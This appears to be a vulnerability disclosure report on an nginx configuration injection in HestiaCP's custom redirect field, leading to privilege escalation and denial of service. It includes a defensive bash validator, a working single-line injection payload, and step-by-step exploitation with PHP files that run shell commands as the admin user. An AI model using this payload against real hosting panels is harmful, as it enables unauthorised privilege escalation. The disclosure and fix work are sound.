Improper Input Validation Leads to Privilege Escalation and Denial of Service in hestiacp/hestiacp
Reported on
Jul 26th 2022
Description
Improper input validation allows an attacker to escalate privileges and to crash the nginx server.
There is no input validation in v-add-web-domain-redirect#L82 or on the "v-redirect-custom" input of the "Edit Web Domain" page: the value is written directly into the /home/user/conf/web/domain.com/nginx.conf_redirect file, which is in turn included by /home/user/conf/web/domain.com/nginx.conf. Because the value lands inside a quoted nginx string, a value containing a double quote, a semicolon or braces can close that string and inject arbitrary nginx directives into the server configuration.
/home/user/conf/web/domain.com/nginx.conf:
    ...
    location ~ /\.(?!well-known\/|file) {
        deny all;
        return 404;
    }
    include /home/test/conf/web/poc.com/nginx.conf_*;
}
/home/user/conf/web/domain.com/nginx.conf_redirect file before the payload (input is "asd"):
if ($host != "asd") {
    return 301 $scheme://asd$request_uri;
}
/home/user/conf/web/domain.com/nginx.conf_redirect file after the payload (each of the two injected lines is a single line in the file):
if ($host != "redStar$request_uri; ## " ) {} location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock; } if ( $host = false ) { #") {
    return 301 $scheme://redStar$request_uri; ## " ) {} location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock; } if ( $host = false ) { #$request_uri;
}
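As an added, defender-side example that is not HestiaCP's own code: a validator that v-add-web-domain-redirect could apply to the v-redirect-custom value before anything is written to nginx.conf_redirect, plus a renderer that mirrors the "before payload" snippet above and prints nothing for an unvalidated value. The function names are hypothetical.

```bash
#!/usr/bin/env bash
# Added example (not HestiaCP's own code): gate the custom redirect value
# before it is interpolated into nginx.conf_redirect. Function names are
# hypothetical; the rendered block mirrors the "before payload" snippet above.

# Returns 0 when TARGET is a host[:port][/path] or http(s) URL made only of
# characters that cannot close the quoted nginx string or open a new block:
# no '"', ';', '{', '}', '$', '#', whitespace or newlines.
is_safe_redirect_target() {
    target="$1"
    [ -n "$target" ] && [ "${#target}" -le 255 ] || return 1
    # An embedded newline would let a second line slip past the anchored regex
    # (grep matches per line), so reject it explicitly first.
    nl="$(printf '\nx')"; nl="${nl%x}"
    case "$target" in *"$nl"*) return 1 ;; esac
    printf '%s\n' "$target" | grep -Eq \
        '^(https?://)?[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*(:[0-9]{1,5})?(/[A-Za-z0-9._~%+=?&/-]*)?$'
}

# Prints the redirect block for a validated target and fails (printing nothing)
# for anything else; the caller writes the output to nginx.conf_redirect.
render_redirect_block() {
    target="$1"
    is_safe_redirect_target "$target" || return 1
    dest="${target#*://}"                    # nginx supplies $scheme, so drop any scheme
    host="${dest%%/*}"; host="${host%%:*}"   # bare host for the $host comparison
    printf 'if ($host != "%s") {\n    return 301 $scheme://%s$request_uri;\n}\n' "$host" "$dest"
}
```

The allow-list is deliberately narrow: anything that is not a plain hostname, port or path character is refused rather than escaped, because nginx has no reliable quoting for arbitrary strings inside a configuration file.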
Proof of Concept
Payload (must be entered as a single line):
redStar$request_uri; ## " ) {} location /adminShell.php { alias [FULLPATHINFO]; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-[HOSTNAME].sock; } if ( $host = false ) { #
Exploiting
[0] Log in as a regular user.
[1] Create a domain in the dashboard.
[2] Go to Files in the top bar.
[3] Go to the "public_html" folder and create a PHP file with the content below, then open it in the browser to obtain the full path and hostname needed to fill in the payload.
x.php
<?php
// Prints the web root path and the hostname used to fill in [FULLPATHINFO] and [HOSTNAME] in the payload.
echo getcwd();
echo "<br>";
system("hostname");
[4] Go to the "Edit Web Domain" page in the dashboard, select "Enable domain redirection", then select "Redirect visitors to a custom domain or web address", enter the payload in the text box and click Save.
[5] Go to the "public_html" folder and create a PHP file named adminShell.php:
adminShell.php
<?php
// Runs through the injected fastcgi_pass socket, so the commands execute as the "admin" user rather than the site user.
system("id; whoami;");
[6] Visit /adminShell.php in the browser; the commands run as the "admin" user.
PoC Video
https://drive.google.com/file/d/1ynnw0C-5dbtxW21aLt4jemUPrCthyXEj/view?usp=sharing
Impact
An authenticated user can escalate privileges to the "admin" user by injecting nginx directives through the redirect setting, and a malformed value in the same field can break the nginx configuration and cause a denial of service.